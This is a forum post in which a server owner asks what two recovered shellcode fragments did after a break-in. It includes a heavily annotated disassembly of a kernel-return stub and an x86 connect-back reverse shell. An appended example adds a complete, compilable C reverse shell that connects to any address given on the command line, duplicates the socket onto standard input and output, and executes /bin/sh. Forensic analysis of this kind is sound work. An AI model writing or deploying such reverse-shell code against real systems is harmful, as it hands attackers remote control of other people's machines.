Hello friends,
I run a personal web server that recently suffered an unfortunate break-in / hacking attempt. The server that was broken into is running CentOS 6.3 (old, yes, I know).
I have already taken the server offline to limit further damage and penetration into my home network.
Recently, while attempting to do a post-mortem analysis of the attacks that were used, I found some shellcode.
Please forgive me, I am ignorant of most technical code (also my English is still very bad). My work friend helped me decrypt these shellcodes. He says they are assembly, but I know very little about assembly language programming, so I come here to ask you whether these programs look bad to you.
Can some assembly guru here please tell me what these codes were used to do to my web server? I am pretty sure they broke into the root account. And I have unplugged this machine, so no more damage can be done.
But still I would like to know HOW they did it, and what the assembly programs exploited, so that I can better protect my server in the future.
Thank you all very much!!
Assembly codes below.
Code:
program 1:
------SNIP--------
.data:0x00000000 0f01f8      swapgs              ; ring-0 only: switch to the kernel GS base (swapgs exists only in 64-bit mode)
.data:0x00000003 e805000000  call func_0000000d  ; payload body at 0xd, just past the iretq (snipped)
.data:0x00000008 0f01f8      swapgs              ; restore the user GS base
.data:0x0000000b 48cf        iretq               ; 48 cf is REX.W + iret = iretq, return to user mode;
                                                 ; the 32-bit-mode listing had split it into "dec eax" / "iret"
------SNIP--------
program 2:
------SNIP--------
.data:0x00000000 31c0        xor eax,eax         ; zero the registers (also keeps the code free of NUL bytes)
.data:0x00000002 31db        xor ebx,ebx
.data:0x00000004 31c9        xor ecx,ecx
.data:0x00000006 31d2        xor edx,edx         ; edx stays 0 for the rest of the code
.data:0x00000008 b066        mov al,0x66         ; eax = 102 = socketcall
.data:0x0000000a b301        mov bl,0x1          ; ebx = 1 = SYS_SOCKET
.data:0x0000000c 51          push ecx            ; 0 (extra stack word, not read by the kernel)
.data:0x0000000d 6a06        push 0x6            ; protocol = IPPROTO_TCP
.data:0x0000000f 6a01        push 0x1            ; type = SOCK_STREAM
.data:0x00000011 6a02        push 0x2            ; domain = AF_INET
.data:0x00000013 89e1        mov ecx,esp         ; ecx -> {2, 1, 6}
.data:0x00000015 cd80        int 0x80            ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
.data:0x00000017 89c6        mov esi,eax         ; esi = socket fd (used only for the connect below)
.data:0x00000019 b066        mov al,0x66         ; socketcall again
.data:0x0000001b 31db        xor ebx,ebx
.data:0x0000001d b302        mov bl,0x2          ; bx = 2 = AF_INET, pushed as the sockaddr family below
.data:0x0000001f 6866686653  push 0x53666866     ; garbled: the bytes read as the remains of "68 <ip>" (push ip),
                                                 ; "66 68 <port>" (push word port) and "66 53" (push bx) with the
                                                 ; 4-byte address and 2-byte port removed before disassembly
.data:0x00000024 fec3        inc bl              ; ebx = 3 = SYS_CONNECT
.data:0x00000026 89e1        mov ecx,esp         ; ecx -> struct sockaddr_in {AF_INET, port, ip}
.data:0x00000028 6a10        push 0x10           ; addrlen = 16
.data:0x0000002a 51          push ecx            ; &sockaddr
.data:0x0000002b 56          push esi            ; sockfd
.data:0x0000002c 89e1        mov ecx,esp         ; ecx -> {sockfd, &sockaddr, 16}
.data:0x0000002e cd80        int 0x80            ; connect(): outbound TCP connection to the attacker (a connect-back shell)
.data:0x00000030 31c9        xor ecx,ecx
.data:0x00000032 b103        mov cl,0x3
.data:0x00000034 loc_00000034:
.data:0x00000034 fec9        dec cl              ; cl = 2, 1, 0
.data:0x00000036 b03f        mov al,0x3f         ; eax = 63 = dup2
.data:0x00000038 cd80        int 0x80            ; dup2(ebx, cl); ebx is still 3, so this assumes the socket got fd 3
.data:0x0000003a 75f8        jne loc_00000034    ; flags from dec cl survive the syscall; loop until fd 0 is done
.data:0x0000003c 31c0        xor eax,eax
.data:0x0000003e 52          push edx            ; 0 = string terminator
.data:0x0000003f 686e2f7368  push 0x68732f6e     ; "n/sh"
.data:0x00000044 682f2f6269  push 0x69622f2f     ; "//bi", so the stack now holds "//bin/sh\0"
.data:0x00000049 89e3        mov ebx,esp         ; ebx = filename
.data:0x0000004b 52          push edx            ; NULL
.data:0x0000004c 53          push ebx            ; &"//bin/sh"
.data:0x0000004d 89e1        mov ecx,esp         ; ecx = argv = {"//bin/sh", NULL}
.data:0x0000004f 52          push edx
.data:0x00000050 89e2        mov edx,esp         ; edx = envp = {NULL}
.data:0x00000052 b00b        mov al,0xb          ; eax = 11 = execve
.data:0x00000054 cd80        int 0x80            ; execve("//bin/sh", argv, envp): shell with stdin/stdout/stderr on the socket
------SNIP--------
thank you all and well wishes!
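Added example, not code from the original post or its author: a C rendering of the syscall sequence in program 2, with helpers that rebuild the execve path and the sockaddr from the push immediates the way they land on an x86 stack. The attacker's address and port are not in the post (those bytes were stripped before disassembly), so the IP and port used here are placeholders assumed for illustration; the names stack_bytes_from_pushes, program2_shell_path, peer_from_pushes and reverse_shell are this example's own.

```c
/* Added example, not code from the original post: a C reading of "program 2".
 * The attacker's IP and port are absent from the post; any address passed to
 * reverse_shell() below is an assumption supplied by the caller. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Rebuild the bytes that a sequence of `push imm32` leaves on a little-endian
 * stack. Each push lowers esp by 4, so the LAST immediate pushed sits at the
 * lowest address and is read first; within a dword the low byte comes first. */
size_t stack_bytes_from_pushes(const uint32_t *imms, size_t n, char *out, size_t outlen)
{
    size_t pos = 0;
    for (size_t i = n; i-- > 0;) {
        for (int b = 0; b < 4; b++) {
            if (pos >= outlen) return pos;
            out[pos++] = (char)((imms[i] >> (8 * b)) & 0xff);
        }
    }
    return pos;
}

/* The three pushes before execve in program 2: edx (0), 0x68732f6e, 0x69622f2f. */
const char *program2_shell_path(void)
{
    static char path[12];
    const uint32_t pushes[] = { 0, 0x68732f6e, 0x69622f2f };
    stack_bytes_from_pushes(pushes, 3, path, sizeof path);   /* "//bin/sh" followed by 4 NUL bytes */
    return path;
}

/* The sockaddr_in built by `push <ip>; push word <port>; push bx` with bl == 2.
 * Arguments are already in network byte order, exactly as the immediates would be. */
struct sockaddr_in peer_from_pushes(uint32_t ip_nbo, uint16_t port_nbo)
{
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;        /* push bx (2 bytes), lowest address */
    sa.sin_port = port_nbo;         /* push word <port> */
    sa.sin_addr.s_addr = ip_nbo;    /* push <ip> (4 bytes), highest address */
    return sa;
}

/* C equivalent of the whole syscall sequence. One difference is deliberate:
 * the shellcode's dup2 loop uses ebx, which is 3 after `inc bl`, so it only
 * works if the new socket happened to get fd 3; here the real fd is used. */
int reverse_shell(const char *ip, uint16_t port)
{
    int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);        /* socketcall SYS_SOCKET {2, 1, 6} */
    if (fd < 0) return -1;
    struct sockaddr_in sa = peer_from_pushes(inet_addr(ip), htons(port));
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {  /* socketcall SYS_CONNECT */
        close(fd);
        return -1;
    }
    for (int i = 2; i >= 0; i--)                                /* dec cl; dup2; jne: fds 2, 1, 0 */
        dup2(fd, i);
    char *sh_argv[] = { "//bin/sh", NULL };                     /* push edx; push ebx */
    char *sh_envp[] = { NULL };                                 /* push edx; mov edx,esp */
    execve(program2_shell_path(), sh_argv, sh_envp);            /* eax = 0xb */
    return -1;                                                  /* only reached if execve failed */
}

int main(int argc, char **argv)
{
    /* 192.0.2.1:4444 is a placeholder (documentation range), not a value from the post */
    struct sockaddr_in sa = peer_from_pushes(inet_addr("192.0.2.1"), htons(4444));
    printf("execve path : %s\n", program2_shell_path());
    printf("sockaddr_in : family=%d port=%u ip=%s\n",
           sa.sin_family, ntohs(sa.sin_port), inet_ntoa(sa.sin_addr));
    /* ./a.out <listener-ip> <port> actually runs the connect-back; use only against your own listener */
    if (argc == 3)
        return reverse_shell(argv[1], (uint16_t)atoi(argv[2]));
    return 0;
}
```

Run without arguments it only decodes the constants; the order of the reconstructed bytes (last push first, low byte first within each dword) is the same reading that turns the two immediates in the listing into "//bin/sh".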